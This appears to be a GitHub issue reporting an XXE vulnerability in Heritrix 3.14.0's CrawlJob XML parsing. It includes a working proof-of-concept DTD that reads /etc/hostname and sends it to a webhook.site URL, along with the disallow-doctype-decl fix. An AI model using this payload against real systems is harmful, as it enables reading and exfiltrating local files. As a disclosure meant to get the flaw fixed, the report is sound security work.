Skip to content

(SECURITY) XML External Entity (XXE) vulnerability in CrawlJob XML parsing #711

@b3at1

Description

@b3at1

I'll preface this by saying, yes, I've read the security.md, and this seems to fall under the elephant in the room but I thought it was still worth a bug report.

XXE to LFI in Heritrix-3.14.0:

Impact:

While the severity of this vulnerability is high, it's of low impact since only authorized heritrix users should have the permissions to modify crawler-beans.cxml. Currently, I believe this vulnerability can only be exploited with write access to the file.

Verification:

  1. Download the latest version of Heritrix. Set it up as specified here.
  2. go to https://webhook.site to get a temporary site
  3. click 'edit' and paste the following in the content field:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "
<!ENTITY &#x25; exfil SYSTEM 'https://webhook.site/<YOUR UUID>/?d=%file;'>"> 
%eval; 
%exfil;

set content type to application/octet-stream
3. add the following somewhere in the crawler conf (crawler-beans.cxml):

<!DOCTYPE beans [
  <!ENTITY % xxe SYSTEM "https://webhook.site/<YOUR UUID>">
  %xxe;
]>
  1. Whenever the job is built (or really whenever the XML is handled in any way) the external entity will exfiltrate the file specified in the dtd.

Remediation:

To mitigate this vulnerability, disable DOCTYPE declarations by setting the XML parser feature http://apache.org/xml/features/disallow-doctype-decl to true in CrawlJob.java. This prevents both XXE attacks and related XML-based DoS vectors (e.g., Billion Laughs).

Before implementing, verify that no legitimate functionality depends on external entity resolution. It didn't seem to be the case here, but it's something to consider.

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions